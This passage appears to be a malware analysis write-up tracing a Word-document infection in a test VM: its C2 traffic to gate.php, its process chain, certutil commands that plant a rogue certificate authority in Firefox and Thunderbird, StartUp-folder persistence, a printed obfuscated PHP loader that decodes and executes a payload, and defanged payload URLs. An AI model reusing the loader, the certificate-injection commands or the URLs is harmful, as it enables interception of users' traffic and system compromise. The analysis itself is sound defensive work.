3$....0.@.k.*..yU....x...C.........j..3...p|9.\E..5r...;.).....*r...)..[:..]sCR.;Gv.8.r0....M..&m...q`e.NH..?......L ^..p.....}=.'.DT.'.f......7 ....).S=.!G.\~.CG.....z......p...$...l.RA,.....JU.F.......p....E..Hy........K.......n..R.'.."A..F..R.lZ...C.TP.?.k^j.u.-.,.}...Y..CH.M.....][..Q.. ....<.. N'7.D._S....2m...9.......-l`K.PX..X+noM=.<.R..''. 9.l.~....O ............. jg=..l.b..hl...r..=....l..O(G...^dr..8.........o6.Y......}.p.3V.v...{...KfW./..R..s..?H.}...z.U....(.OS.!..<.:5....h}..e."....x.1.&S.P....Q...q1EP.IV....1J..K~3u.D.p'.P.....c........'6.u..a......Ic.Q.}....j...-.t.h .......>.Nq.z.!....L.......O1j.^.~j...3Z.;....l....r...~m.P.....&.....gI.Xo.C..y.t..#........F.A..+..m..Qo.C....nd.Q..5.}.$gB..*...>^@+E..M.$>.e.7!-.A.) ..M.h. ..(.s.....N:.....v9Sp.....O.<U..r..-8k`..K......f.4 9d#.4.X..a.e.]4........|..k..//J .9.3..B(mXM'y.....t..w...T.b...g|<. g{?....\<.A.C._.....)....f......&.<...f..D....K1.........d..a...U. b..zY..>a..E.....o.A.O..W....2..{..r...^.~.....o..t.......o..`.#5.g..>......,.....\.p....v.L.{.P0..3=.U..m.u8w..R.+....Rf..(*.....c... ..?S.....A..S....B6.P#<... 0
There is one POST though that is interesting since the response from the server to the infected VM looks like a binary.
POST /bdk/gate.php HTTP/1.1 Accept: */* Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: Content-Length: 298 Connection: Close a.q..2..]..>)...&E.`.J3.....O.I.,i.2.......y ..Mk.oj.e.p..;.q.e..].../..... .Kd.....@...E[.. ..).....>....I.+h..Z.....U.%.....L.....u..e..7.^x[....\.y.......~.@`,~...M*F..6.ay...r.x..'oj.%....uI....AoW.}.../. g..0......Ni.tX.._...$..E.,../.J3di.^.....^...{?...L(sl1..).. .Il...V......WF.=|........~ HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Wed, 25 Jan 2017 15:58:24 GMT Content-Type: application/octet-stream Content-Length: 699 Connection: close X-Powered-By: PHP/5.4.45 Content-Description: File Transfer Content-Disposition: attachment; filename=tv.dat Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public .l..x.$^...*...B--...#Z.....".$.t......L..E[eC.&......r...*.....S'%..|......
Looking at this from a high level system perspective and not just from the network; the Word document starts a SVCHOST process, which in turn kicks off a “CMD.exe /K” command in thread 2272. The SVCHOST process also creates a file called “BNCF61.tmp” located in the “C:\Users\%username%\AppData\Local\Temp\” folder and then proceeds to start this as a new process as well. The “BNCF61.tmp” file then starts “explorer.exe,” which in turn starts up the “MSIEXEC.exe” process. At this point numerous files have been written to the file system in the “C:\Users\%username%\AppData\Local\Temp\” folder and to the “C:\Users\%username%\AppData\Roaming” folder (see the artifacts section above). One thing to note here – most of the files written to the the filesystem are written by the MSIEXEC.exe process or the certutil.exe process with a handful of files being written by the “SearchProtocolHost.exe” process.
Also, as seen in the Process Monitor logs the MSIEXEC.exe process starts up a “certutil” process:
Date: 1/25/2017 9:57:35 AM Thread: 2008 PID: 2088 Command line: "C:\Users\ADMINI~1\AppData\Local\Temp\certutil.exe" -A -n "ybarwio" -t "C,C,C" -i "C:\Users\ADMINI~1\AppData\Local\Temp\akpeydzais.crt" -d "C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\cnpfjmzq.default"
which adds this to the Firefox Certificate Manager under “Authorities.”
and also looks like it adds to Thunderbird as well:
Date: 1/25/2017 9:57:37 AM Thread: 2008 PID: 2768 Command line: "C:\Users\ADMINI~1\AppData\Local\Temp\certutil.exe" -A -n "meekmowey" -t "C,C,C" -i "C:\Users\ADMINI~1\AppData\Local\Temp\akpeydzais.crt" -d "C:\Users\Administrator\AppData\Roaming\Thunderbird\Profiles\3zzscv0r.default"
I also saw the msiexec.exe process writing a registry key to “HKCU\Software\Microsoft\Raezr” while the process creates and modifies keys under the “HKCU\Software\Microsoft\Raezr\Uggiygiru” key. I have added that registry hive to the artifacts folder. Also, it looks as if persistence is obtained by writing a file called “php.lnk” in the StartUp folder. This file points to the php.exe file in the “Qufyzo” folder which then reads the oqluy.php file. The obfuscated code for that file is below:
<?php $GLOBALS['2112334483']=Array('file_' .'g' .'e' .'t_cont' .'en' .'ts','file' .'_p' .'ut_contents','exec','array_' .'fill','curl_mu' .'l' .'ti_r' .'em' .'ove_handl' .'e','unlink','st' .'rpos','array' .'_revers' .'e','strlen','' .'im' .'agecreate','strlen','ch' .'r','ord','str' .'pos','c' .'u' .'r' .'l_mult' .'i_' .'in' .'fo_' .'r' .'ead','c' .'hr','mt_' .'rand'); ?><?php function _1988818774($lcafoi){$wzfwbx=Array("\x6f\xc9\x3c\xcf\x5e\x91\x13\xe8\x72\xb4\x06\xf1\x46\x98\x0a\xee\x44\x85\x05\xea\x5e\x8a\x39\xde\x42\x89\x22\xc1\x47\x9b\x3b\xf3\x5b\x9a\x05\xcb\x5b\x9b\x35\xea\x5e\x92\x1c\xc3\x6b\x88\x0e\xc9\x5d\xd1\x18\xc7\x55","\x6f\xc9\x3c\xcf\x5e\x91\x13\xe8\x72\xb4\x06\xf1\x46\x98\x0a\xee\x44\x85\x05\xea\x5e\x8a\x39\xde\x42\x89\x22\xc1\x47\x9b\x3b\xf3\x5b\x9a\x05\xcb\x5b\x9b\x35\xea\x5e\x92\x1c\xc3\x6b\x88\x0e\xc9\x5d\xd1\x18\xc7\x55\x2e\x08\xdf\x5e",'ab','mobbctpncubwqbbw','qfz','','p','bpsopktsibfnjrm','cepz');return $wzfwbx[$lcafoi];} ?><?php $xknhjqu=-round(0+45723178.4+45723178.4+45723178.4+45723178.4+45723178.4);$yljzott=_1988818774(0);$hiktbbe=_1988818774(1);$yljzott=jqnwmyo($yljzott,$xknhjqu);$hiktbbe=jqnwmyo($hiktbbe,$xknhjqu);$oubwoyp=_1988818774(2);$vxmksnu=$GLOBALS['2112334483'][0]($yljzott);if($vxmksnu){$emdilrw=jqnwmyo($vxmksnu,$xknhjqu);$GLOBALS['2112334483'][1]($hiktbbe,$emdilrw);$GLOBALS['2112334483'][2]($hiktbbe);if((round(0+898+898+898)+round(0+771.66666666667+771.66666666667+771.66666666667))>round(0+538.8+538.8+538.8+538.8+538.8)|| $GLOBALS['2112334483'][3]($xknhjqu));else{$GLOBALS['2112334483'][4]($vxmksnu,$hiktbbe,$qiujhbx);}while(!$GLOBALS['2112334483'][5]($hiktbbe))Sleep(round(0+0.5+0.5));if($GLOBALS['2112334483'][6](_1988818774(3),_1988818774(4))!==false)$GLOBALS['2112334483'][7]($dcbcwxb,$amiuzub,$dcbcwxb,$amiuzub);}function tytuykg($bxhnecg,$dcbcwxb){$kzptguq=$dcbcwxb&round(0+15.5+15.5);return($bxhnecg << $kzptguq)|(($bxhnecg >>(round(0+16+16)-$kzptguq))&((round(0+0.5+0.5)<<(round(0+15.5+15.5)&$kzptguq))-round(0+0.25+0.25+0.25+0.25)));}function jqnwmyo($amiuzub,$xknhjqu){$zdubkat=_1988818774(5);if((round(0+215.5+215.5)^round(0+86.2+86.2+86.2+86.2+86.2))&& $GLOBALS['2112334483'][8]($kzptguq,$yljzott,$bxhnecg))$GLOBALS['2112334483'][9]($belxvol,$xknhjqu,$kzptguq);$belxvol=$GLOBALS['2112334483'][10]($amiuzub);$mtukbjc=_1988818774(6);for($qiujhbx=round(0);$qiujhbx<$belxvol;++$qiujhbx){$dvvevxt=$GLOBALS['2112334483'][11]($GLOBALS['2112334483'][12]($amiuzub{$qiujhbx})^($xknhjqu&round(0+127.5+127.5)));if($GLOBALS['2112334483'][13](_1988818774(7),_1988818774(8))!==false)$GLOBALS['2112334483'][14]($zdubkat);$zdubkat .= $dvvevxt;(round(0+1071.3333333333+1071.3333333333+1071.3333333333)-round(0+1071.3333333333+1071.3333333333+1071.3333333333)+round(0+1216.5+1216.5+1216.5+1216.5)-round(0+973.2+973.2+973.2+973.2+973.2))?$GLOBALS['2112334483'][15]($bxhnecg,$bxhnecg,$qiujhbx):$GLOBALS['2112334483'][16](round(0+152),round(0+803.5+803.5+803.5+803.5));$xknhjqu=tytuykg($xknhjqu,round(0+4+4));++$xknhjqu;$vmdhslf=round(0+640.4+640.4+640.4+640.4+640.4);}return $zdubkat;$rekqtac=round(0+833.33333333333+833.33333333333+833.33333333333);} ?>
I was not sure what exactly this PHP was doing, so I rebooted the VM to see what processes spun up and what processes tried to call back out from the VM. It looks like it calls the “explorer.exe” process which then spins up the “msiexec.exe” process which proceeds to sit there and listen for connections.
As seen in the image below, SVCHOST was talking to the IP address of over HTTP prior to the reboot.
Lastly, before rebooting the VM, I did run strings2 on the SVCHOST.exe process shown above. Looking through that output, I did notice some other URLs that were not used in this infection. Those URLs are as follows:
hxxp:// hxxp:// hxxp:// hxxp://sy-nitron[.]pl/wp-content/themes/twentyfifteen/pm1 hxxp://acdclubs[.]com/wp-content/plugins/quick-setup/pm1 hxxp://cwmeza[.]com/wp-content/plugins/video-silo-builder-1[.]6[.]3/pm1 hxxp://drums-outlet[.]com/wp-content/plugins/wordbay/pm1 hxxp://gojokai-trouble[.]com/wp-content/plugins/contact-form-7/modules/pm1 hxxp://hareruyalife[.]com/wp-content/plugins/feedwordpress/pm1 hxxp://sy-nitron[.]pl/wp-content/themes/twentyfifteen/2501 hxxp://acdclubs[.]com/wp-content/plugins/quick-setup/2501 hxxp://cwmeza[.]com/wp-content/plugins/video-silo-builder-1[.]6[.]3/2501 hxxp://drums-outlet[.]com/wp-content/plugins/wordbay/2501 hxxp://gojokai-trouble[.]com/wp-content/plugins/contact-form-7/modules/2501 hxxp://hareruyalife[.]com/wp-content/plugins/feedwordpress/2501
There was a whole lot more in the strings2 output that looked like it was reading the system details from what applications were installed to what the Windows firewall was setup as.